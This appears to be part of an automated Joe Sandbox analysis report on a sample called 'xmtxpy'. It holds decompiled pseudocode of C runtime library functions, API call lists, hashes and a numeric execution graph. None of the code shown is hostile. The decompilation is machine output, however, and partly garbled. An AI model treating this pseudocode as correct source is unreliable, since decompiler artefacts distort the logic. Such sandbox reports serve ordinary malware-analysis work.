                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008AFCFE
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008AFD11
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008AFD24
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008AFD37
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008AFD4A
                          • __mtinitlocks.LIBCMT ref: 008AEDFF
                          • __mtterm.LIBCMT ref: 008AEE08
                            • Part of subcall function 008AEE70: DeleteCriticalSection.KERNEL32(?,?,?,?,008AEE6C), ref: 008B01D4
                            • Part of subcall function 008AEE70: _free.LIBCMT ref: 008B01DB
                            • Part of subcall function 008AEE70: DeleteCriticalSection.KERNEL32(008BE050,?,?,008AEE6C), ref: 008B01FD
                          • __calloc_crt.LIBCMT ref: 008AEE2D
                          • __initptd.LIBCMT ref: 008AEE4F
                          • GetCurrentThreadId.KERNEL32(008AE8DA), ref: 008AEE56
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 3567560977-0
                          • Opcode ID: ea20bad41eda4547a5248adeb01d1754c579a6268649fc2e0c3d880b6d440346
                          • Instruction ID: 5818addd167e8e74cf8e56be3865739bf0e1a63963f318d768295572e4e5bb10
                          • Opcode Fuzzy Hash: ea20bad41eda4547a5248adeb01d1754c579a6268649fc2e0c3d880b6d440346
                          • Instruction Fuzzy Hash: 0FF0B432245B111AF6243B7CBC1B74B3681FB03730F200E29F161D99E2EF2094124552
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008AEE8D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 16%
                          			E008AEE8D(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}





                          0x008aee91
                          0x008aee9c
                          0x008aeea4
                          0x008aeeae
                          0x008aeeb6
                          0x00000000
                          0x008aeebb
                          0x008aeeb6
                          0x008aeec0

                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,008AEECC,00000000,?,008B23C4,000000FF,0000001E,00000000,00000000,00000000,?,008B039E), ref: 008AEE9C
                          • GetProcAddress.KERNEL32(?,CorExitProcess,?,?,008AEECC,00000000,?,008B23C4,000000FF,0000001E,00000000,00000000,00000000,?,008B039E,00000000), ref: 008AEEAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 1646373207-1276376045
                          • Opcode ID: 249d69c3c2c87243973d28c7d34586873538a97f8847c1984ca131c15fd21474
                          • Instruction ID: db02c1f7bbd13a958da40bc1a58c1b6aab34935f565b77e06af8b5886e02d989
                          • Opcode Fuzzy Hash: 249d69c3c2c87243973d28c7d34586873538a97f8847c1984ca131c15fd21474
                          • Instruction Fuzzy Hash: 44D01230A44208BBDB115B91DC05F9A776DFB01741F040564FE58D5590DB719A149650
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008B458A Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E008B458A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E008B0791( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E008B44CC( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E008B10B7(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                          0x008b4592
                          0x008b4597
                          0x008b45b1
                          0x00000000
                          0x008b45b1
                          0x008b4599
                          0x008b459e
                          0x00000000
                          0x00000000
                          0x008b45a3
                          0x008b45c0
                          0x008b45c5
                          0x008b45c8
                          0x008b45cf
                          0x008b45ee
                          0x008b45f5
                          0x008b45f7
                          0x008b463b
                          0x008b464a
                          0x008b4658
                          0x008b465a
                          0x008b466a
                          0x008b466a
                          0x008b466e
                          0x008b4670
                          0x008b4673
                          0x008b4673
                          0x008b4673
                          0x008b4673
                          0x00000000
                          0x008b4679
                          0x008b465c
                          0x008b465c
                          0x008b4661
                          0x008b4661
                          0x008b4664
                          0x00000000
                          0x008b4664
                          0x008b45f9
                          0x008b45fc
                          0x008b4600
                          0x008b4629
                          0x008b4629
                          0x008b462c
                          0x008b462c
                          0x00000000
                          0x00000000
                          0x008b462e
                          0x008b4632
                          0x00000000
                          0x00000000
                          0x008b4634
                          0x008b4634
                          0x00000000
                          0x008b4634
                          0x008b4602
                          0x008b4605
                          0x00000000
                          0x00000000
                          0x008b4609
                          0x008b461c
                          0x008b4622
                          0x008b4625
                          0x008b4627
                          0x00000000
                          0x00000000
                          0x00000000
                          0x008b4627
                          0x008b45d1
                          0x008b45d4
                          0x008b45d6
                          0x008b45db
                          0x008b45db
                          0x008b45e0
                          0x00000000
                          0x008b45e0
                          0x008b45a5
                          0x008b45aa
                          0x008b45ae
                          0x008b45ae
                          0x00000000

                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B45C0
                          • __isleadbyte_l.LIBCMT ref: 008B45EE
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B461C
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B4652
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 6b240b56edede272b571c86c1ffde9a1f4641c8eee282ae4ba3bd2cf56c8d29b
                          • Instruction ID: b94b253cd542ed38b82e61e7192ea3bbd12b33aa9e81b9c686609f39ed242f49
                          • Opcode Fuzzy Hash: 6b240b56edede272b571c86c1ffde9a1f4641c8eee282ae4ba3bd2cf56c8d29b
                          • Instruction Fuzzy Hash: 3D31D03060065AAFEB218F79CC46BFA7BB5FF42350F155529E864C72A2E730E854DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008B2429 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E008B2429(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x8bf100, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x8bff38 - _t7;
								if(__eflags == 0) {
									_t9 = E008B10B7(__eflags);
									 *_t9 = E008B10CA(GetLastError());
									goto L17;
								} else {
									__eflags = E008B13B0(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E008B10B7(__eflags);
										 *_t12 = E008B10CA(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E008B13B0(_t6, _t31);
						 *((intOrPtr*)(E008B10B7(__eflags))) = 0xc;
						goto L12;
					} else {
						E008B0308(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E008B2397(__ebx, __edx, __edi, _a8);
				}
			}









                          0x008b2430
                          0x008b243e
                          0x008b2441
                          0x008b2443
                          0x008b2452
                          0x008b2485
                          0x008b2485
                          0x008b2488
                          0x00000000
                          0x00000000
                          0x008b2455
                          0x008b2457
                          0x008b2459
                          0x008b2459
                          0x008b2459
                          0x008b2466
                          0x008b246c
                          0x008b246e
                          0x008b2470
                          0x008b24d0
                          0x008b24d0
                          0x008b2472
                          0x008b2472
                          0x008b2478
                          0x008b24ba
                          0x008b24ce
                          0x00000000
                          0x008b247a
                          0x008b2481
                          0x008b2483
                          0x008b24a2
                          0x008b24b6
                          0x008b249c
                          0x008b249c
                          0x008b249c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x008b2483
                          0x008b2478
                          0x00000000
                          0x008b249e
                          0x008b248b
                          0x008b2496
                          0x00000000
                          0x008b2445
                          0x008b2448
                          0x008b244e
                          0x008b244e
                          0x008b249f
                          0x008b24a1
                          0x008b2432
                          0x008b243c
                          0x008b243c

                          APIs
                          • _free.LIBCMT ref: 008B2448
                            • Part of subcall function 008B2397: __FF_MSGBANNER.LIBCMT ref: 008B23AE
                            • Part of subcall function 008B2397: __NMSG_WRITE.LIBCMT ref: 008B23B5
                            • Part of subcall function 008B2397: RtlAllocateHeap.NTDLL(004F0000,00000000,00000001,00000000,00000000,00000000,?,008B039E,00000000,00000000,00000000,00000000,?,008B0253,00000018,008BCE98), ref: 008B23DA
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 02115ea06127abb5c6a41f910a8904db0b355bb0f958777a09a344ef4b836d10
                          • Instruction ID: f0aa836b5b536b0d6639989ecb9ac4590cd3c53bf8cec690e951bc032c7541af
                          • Opcode Fuzzy Hash: 02115ea06127abb5c6a41f910a8904db0b355bb0f958777a09a344ef4b836d10
                          • Instruction Fuzzy Hash: 22110632500A15EFCF203F78AC08BDA37D8FF14364F104625FA48DEBA1EA3588818699
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008B5DFD Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E008B5DFD(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E008B634E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E008B5E83(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E008B65C9(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E008B6508(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                          0x008b5e00
                          0x008b5e06
                          0x008b5e79
                          0x00000000
                          0x008b5e0d
                          0x008b5e0d
                          0x008b5e10
                          0x008b5e2b
                          0x008b5e2e
                          0x008b5e4e
                          0x008b5e60
                          0x008b5e30
                          0x008b5e30
                          0x008b5e33
                          0x00000000
                          0x008b5e35
                          0x008b5e47
                          0x008b5e47
                          0x008b5e33
                          0x008b5e7e
                          0x008b5e82
                          0x008b5e12
                          0x008b5e2a
                          0x008b5e2a
                          0x008b5e10

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                          • Instruction ID: 52323a7aeb8314376a3117bedf4e11b5d1e225a609a33d4a0d7b72315e6ec6a5
                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                          • Instruction Fuzzy Hash: 8201087240054EBBCF225E98CC41DEE3F66FB1C354B598415FA1899235D336DAB1AB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008A2AC1 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E008A2AC1(void* __eax, void* __esi) {
				intOrPtr _t8;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;

				_t17 = __esi + 1;
				_t20 = __eax + 1 -  *0x8bed30; // 0x8bfc08
				if(_t20 != 0) {
					E008B0308(_t5);
				}
				_t21 =  *((intOrPtr*)(_t17 + 0x44)) -  *0x8bed34; // 0x8bfc08
				if(_t21 != 0) {
					E008B0308(_t6);
				}
				_t22 =  *((intOrPtr*)(_t17 + 0x48)) -  *0x8bed38; // 0x8bfc08
				if(_t22 != 0) {
					E008B0308(_t7);
				}
				_t8 =  *((intOrPtr*)(_t17 + 0x4c));
				_t23 = _t8 -  *0x8bed3c; // 0x8bfc08
				if(_t23 != 0) {
					_t8 = E008B0308(_t8);
				}
				return _t8;
			}









                          0x008b2600
                          0x008b2602
                          0x008b2608
                          0x008b260b
                          0x008b2610
                          0x008b2614
                          0x008b261a
                          0x008b261d
                          0x008b2622
                          0x008b2626
                          0x008b262c
                          0x008b262f
                          0x008b2634
                          0x008b2635
                          0x008b2638
                          0x008b263e
                          0x008b2641
                          0x008b2646
                          0x008b2649

                          APIs
                          • _free.LIBCMT ref: 008B260B
                            • Part of subcall function 008B0308: HeapFree.KERNEL32(00000000,00000000), ref: 008B031C
                            • Part of subcall function 008B0308: GetLastError.KERNEL32(00000000,?,008AED38,00000000,008B10BC,008B7791,00000000,?,008B688D,00000000,00010000,00030000,?,008B4AE7), ref: 008B032E
                          • _free.LIBCMT ref: 008B261D
                          • _free.LIBCMT ref: 008B262F
                          • _free.LIBCMT ref: 008B2641
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 25b42ed8889a5afab1f3351924d049d24a8b292386ec0a623a96f03d2346be71
                          • Instruction ID: 43e15a15d5b96cb2ff248fd7215bf6be304855f98b2f329056588cc4e60cfb3e
                          • Opcode Fuzzy Hash: 25b42ed8889a5afab1f3351924d049d24a8b292386ec0a623a96f03d2346be71
                          • Instruction Fuzzy Hash: 33E092321952149FD614EBACF9CA8DB33ECF6193107740C05F085C7320D625F8804B25
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008A592D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 61%
                          			E008A592D(intOrPtr* __eax, void* __edx, void* __edi, void* __esi) {
				signed int _v4;
				signed int _t7;
				void* _t8;
				void* _t10;
				void* _t11;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t29;
				signed int _t31;
				void* _t35;
				void* _t36;

				_t25 = __edi;
				_t24 = __edx;
				 *__eax =  *__eax + __eax;
				_t36 = _t35 + 0xc;
				if(__eax != 0) {
					L9:
					_push(_t19);
					_push(_t19);
					_push(_t19);
					_push(_t19);
					_push(_t19);
					E008B1058(_t19, _t24);
					asm("int3");
					_push(_t31);
					_t7 = _v4;
					 *0x8bf418 = _t7;
					return _t7;
				} else {
					_t8 = E008B193E(0x8bf452);
					_pop(_t21);
					if(_t8 + 1 <= 0x3c) {
						L4:
						_t10 = E008B19EB(0x8bf420, 0x314, L"\n\n");
						_t36 = _t36 + 0xc;
						if(_t10 != 0) {
							goto L9;
						} else {
							_t11 = E008B19EB(0x8bf420, 0x314, _t25);
							_t36 = _t36 + 0xc;
							_t43 = _t11;
							if(_t11 != 0) {
								goto L9;
							} else {
								E008B1B15(_t21, _t24, _t43, 0x8bf420, L"Microsoft Visual C++ Runtime Library", 0x12010);
								_pop(_t20);
								_pop(_t26);
								_pop(_t29);
								return E008B1CFB(_t20, _v4 ^ _t31, _t24, _t26, _t29);
							}
						}
					} else {
						_t21 = 0x8bf3dc + E008B193E(0x8bf452) * 2;
						_t18 = E008B1A57(0x8bf3dc + E008B193E(0x8bf452) * 2, __esi - (0x8bf3dc + E008B193E(0x8bf452) * 2 - 0x8bf452 >> 1), L"...", 3);
						_t36 = _t36 + 0x14;
						if(_t18 != 0) {
							goto L9;
						} else {
							goto L4;
						}
					}
				}
			}


















                          0x008a592d
                          0x008a592d
                          0x008af882
                          0x008af884
                          0x008af889
                          0x008af985
                          0x008af985
                          0x008af986
                          0x008af987
                          0x008af988
                          0x008af989
                          0x008af98a
                          0x008af98f
                          0x008af990
                          0x008af993
                          0x008af996
                          0x008af99c
                          0x008af88f
                          0x008af894
                          0x008af89a
                          0x008af89e
                          0x008af8d5
                          0x008af8e5
                          0x008af8ea
                          0x008af8ef
                          0x00000000
                          0x008af8f5
                          0x008af8fc
                          0x008af901
                          0x008af904
                          0x008af906
                          0x00000000
                          0x008af908
                          0x008af913
                          0x008af974
                          0x008af978
                          0x008af97b
                          0x008af984
                          0x008af984
                          0x008af906
                          0x008af8a0
                          0x008af8b1
                          0x008af8c5
                          0x008af8ca
                          0x008af8cf
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x008af8cf
                          0x008af89e

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.464471170.00000000008A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000005.00000002.464447223.00000000008A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464539472.00000000008B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464552230.00000000008BE000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.464566696.00000000008C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: Message___crt__invoke_watson
                          • String ID: ...$Microsoft Visual C++ Runtime Library
                          • API String ID: 1560407238-1400160072
                          • Opcode ID: 9079c4aea4a7d55a3d4ba95c012d5d2649afd720f8422bc88494445431a5c4fa
                          • Instruction ID: 2a786292ba2e1302313ff6bfd6ff2c13696f24582b93c1c4ab7a77e6bb9970a0
                          • Opcode Fuzzy Hash: 9079c4aea4a7d55a3d4ba95c012d5d2649afd720f8422bc88494445431a5c4fa
                          • Instruction Fuzzy Hash: 0201D411B5020122EA2126B92D2BBEF5F58FB1B714B880135FF15E9B83F9459B188096
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:19%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1246
                          Total number of Limit Nodes:99
                          execution_graph 14265 409046 14278 413b28 14265->14278 14267 40906d 14270 405b6f 6 API calls 14267->14270 14268 40904e 14268->14267 14269 403fbf 7 API calls 14268->14269 14269->14267 14271 40907c 14270->14271 14272 409092 14271->14272 14282 409408 14271->14282 14274 4090a3 14272->14274 14277 402bab 2 API calls 14272->14277 14276 402bab 2 API calls 14276->14272 14277->14274 14279 413b31 14278->14279 14280 413b38 14278->14280 14281 404056 7 API calls 14279->14281 14280->14268 14281->14280 14283 409413 14282->14283 14284 40908c 14283->14284 14296 409d36 14283->14296 14284->14276 14295 40945c 14402 40a35d 14295->14402 14297 409d43 14296->14297 14298 40a35d 5 API calls 14297->14298 14299 409d55 14298->14299 14300 4031e5 4 API calls 14299->14300 14301 409d8b 14300->14301 14302 4031e5 4 API calls 14301->14302 14303 409dd0 14302->14303 14304 405b6f 6 API calls 14303->14304 14336 409423 14303->14336 14306 409df7 14304->14306 14305 409e1c 14307 4031e5 4 API calls 14305->14307 14305->14336 14306->14305 14309 402bab 2 API calls 14306->14309 14308 409e62 14307->14308 14310 4031e5 4 API calls 14308->14310 14309->14305 14311 409e82 14310->14311 14312 4031e5 4 API calls 14311->14312 14313 409ea2 14312->14313 14314 4031e5 4 API calls 14313->14314 14315 409ec2 14314->14315 14316 4031e5 4 API calls 14315->14316 14317 409ee2 14316->14317 14318 4031e5 4 API calls 14317->14318 14319 409f02 14318->14319 14320 4031e5 4 API calls 14319->14320 14321 409f22 14320->14321 14322 4031e5 4 API calls 14321->14322 14325 409f42 14322->14325 14323 40a19b 14324 408b2c 5 API calls 14323->14324 14324->14336 14325->14323 14326 409fa3 14325->14326 14327 405b6f 6 API calls 14326->14327 14326->14336 14330 409fbd 14327->14330 14328 40a02c 14329 40a16d 14328->14329 14331 4031e5 4 API calls 14328->14331 14334 402bab 2 API calls 14329->14334 14329->14336 14330->14328 14332 402bab 2 API calls 14330->14332 14333 40a070 14331->14333 14335 409fd7 14332->14335 14338 4031e5 4 API calls 14333->14338 14334->14336 14337 405b6f 6 API calls 14335->14337 14336->14295 14358 4056bf 14336->14358 14340 409fe5 14337->14340 14339 40a090 14338->14339 14342 4031e5 4 API calls 14339->14342 14340->14328 14341 402bab 2 API calls 14340->14341 14343 409fff 14341->14343 14344 40a0b0 14342->14344 14345 405b6f 6 API calls 14343->14345 14347 4031e5 4 API calls 14344->14347 14346 40a00d 14345->14346 14346->14328 14349 40a021 14346->14349 14348 40a0d0 14347->14348 14350 4031e5 4 API calls 14348->14350 14351 402bab 2 API calls 14349->14351 14352 40a0f0 14350->14352 14351->14336 14353 4031e5 4 API calls 14352->14353 14354 40a110 14353->14354 14355 40a134 14354->14355 14356 4031e5 4 API calls 14354->14356 14355->14329 14412 408b2c 14355->14412 14356->14355 14359 402b7c 2 API calls 14358->14359 14361 4056cd 14359->14361 14360 4056d4 14363 408c4d 14360->14363 14361->14360 14362 402b7c 2 API calls 14361->14362 14362->14360 14364 413ba4 7 API calls 14363->14364 14366 408c5c 14364->14366 14365 40903e 14386 413aca 14365->14386 14366->14365 14367 408f02 14366->14367 14368 408f3a 14366->14368 14369 405b6f 6 API calls 14367->14369 14370 405b6f 6 API calls 14368->14370 14372 408f0c 14369->14372 14371 408f51 14370->14371 14371->14365 14373 408f31 14371->14373 14377 409031 14371->14377 14379 409022 14371->14379 14383 405b6f 6 API calls 14371->14383 14384 402bab GetProcessHeap HeapFree 14371->14384 14415 4044ee 14371->14415 14425 40a1b6 14371->14425 14372->14365 14372->14373 14374 40a1b6 15 API calls 14372->14374 14375 402bab 2 API calls 14373->14375 14374->14373 14375->14365 14378 402bab 2 API calls 14377->14378 14378->14373 14380 402bab 2 API calls 14379->14380 14381 409028 14380->14381 14382 402bab 2 API calls 14381->14382 14382->14373 14383->14371 14384->14371 14387 409451 14386->14387 14388 413ad7 14386->14388 14396 405695 14387->14396 14389 405781 4 API calls 14388->14389 14390 413af0 14389->14390 14391 405781 4 API calls 14390->14391 14392 413afe 14391->14392 14393 405762 4 API calls 14392->14393 14394 413b0e 14393->14394 14394->14387 14395 405781 4 API calls 14394->14395 14395->14387 14397 4056a0 14396->14397 14398 4056b9 14396->14398 14399 402bab 2 API calls 14397->14399 14398->14295 14400 4056b3 14399->14400 14401 402bab 2 API calls 14400->14401 14401->14398 14403 40a39a 14402->14403 14406 40a368 14402->14406 14404 40a3af 14403->14404 14407 4031e5 4 API calls 14403->14407 14405 40a3ca 14404->14405 14408 408b2c 5 API calls 14404->14408 14409 40a38a 14405->14409 14411 408b2c 5 API calls 